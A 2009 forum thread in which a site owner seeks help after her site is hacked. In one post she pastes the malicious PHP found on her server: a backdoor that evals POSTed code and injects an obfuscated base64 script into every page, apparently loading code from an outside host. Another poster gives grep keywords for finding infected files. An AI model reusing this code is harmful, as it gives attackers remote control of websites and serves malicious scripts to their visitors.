1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Our site is hacked?

Discussion in 'Content Management' started by Djedda, Mar 18, 2009.

  1. #1
    We did get an answer.
     
    Djedda, Mar 18, 2009 IP
  2. Mr Goldberg

    Mr Goldberg Banned

    Messages:
    651
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I would suggest you to get your site revamped in Joomla CMS ,as Joomla has been the best CMS since 3 yrs now and its not going to die like all other CMS. If you want,we can plan oout something real good for you.
    If you dont mind,then PM me your site URL please..
    Thanks :)
     
    Mr Goldberg, Mar 18, 2009 IP
  3. Djedda

    Djedda Peon

    Messages:
    109
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Thanks for the reply.

    Joomla is more Bloggingstyle, we don't like that, sorry:eek:

    Also, this will cost us a lot of money I think, we have many articles.
     
    Djedda, Mar 18, 2009 IP
  4. Mr Goldberg

    Mr Goldberg Banned

    Messages:
    651
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #4
    Joomla is more Bloggingstyle ? :D

    Dude,you must be kidding me..
    We have been working on Joomla since 3 yrs now and we have developed and worked for around 300 companies from USA only.
    What more you want to say Sir?

    If you want,I can show you my portfolio even .

    I think,you got mistaken by Wordpress's name :D
     
    Mr Goldberg, Mar 18, 2009 IP
  5. Djedda

    Djedda Peon

    Messages:
    109
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Show me your portfolio.

    Thank you.

    PS. I'm a Lady:p, not a Sir
     
    Djedda, Mar 18, 2009 IP
  6. Djedda

    Djedda Peon

    Messages:
    109
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #6
    I thought that PHP Cow was willing to help us, but no:(
    Anyone else who has problems with the support of PHP Cow?

    Our site is now offline for about 5 days.

    Thank you!
     
    Djedda, Mar 19, 2009 IP
  7. originator

    originator Peon

    Messages:
    209
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #7
    No, you are wrong! Check my signature links. All made with Joomla!
    And with Joomla it's easy to work with many articles.
    See my company website: www.friebach-media.com (build with Joomla)
    No bloggingstyle websites! :)
     
    originator, Mar 20, 2009 IP
  8. Djedda

    Djedda Peon

    Messages:
    109
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #8
    :eek: Anyone who give us some tips?

    This is what we found:
    tmp_lkojfghx

    <?php
    if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdDaiUzQ2RVQXN4dlRjQ2pyaXB0JTIwc1NaQ3Jjcm8lM0QlMkZ4dlQlMkZTWkM5Q2o0WU8zJTJFMllPMzQ3U1pDJTJFMmtBJTJFa0Exa0E5NSUyRmp4dlRxWU8zdWVPV1hyeSUyRXJvanMlM0UlM0MlMkZTWkNzY1lPM3JPV1hpeHZUcE9XWHRrQSUzRScpLnJlcGxhY2UoL1lPM3x4dlR8cm98Q2p8U1pDfGtBfGRVQXxPV1gvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function
    tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]
    as $v)if(count(explode("
    ",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#eval#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script
    language=javascript><!--
    document.write(unescape(.+?
    --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return$g?gzencode($s):$s;}functiontmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else$s[]=array($a=='default outputhandler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
     
    Djedda, Mar 23, 2009 IP
  9. andatech

    andatech Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    Our site was hacked about the same time too, After few days, it gets worse because we didn't clean the souce script. It starts to replace all the .php and all .html file.

    You ll need to look closely in the .js especially inside the component files and folder. It may looks like original , but most of them are hack scripts. Use grep to find them.

    Search for this keywords.
    -gzencode
    -motools
    -ob_start

    i ll let you know if we see more, if you don not clear the js or the script, the code may come back again even though if you secured the permission.

    I hope this can helps even not much.
     
    andatech, Apr 9, 2009 IP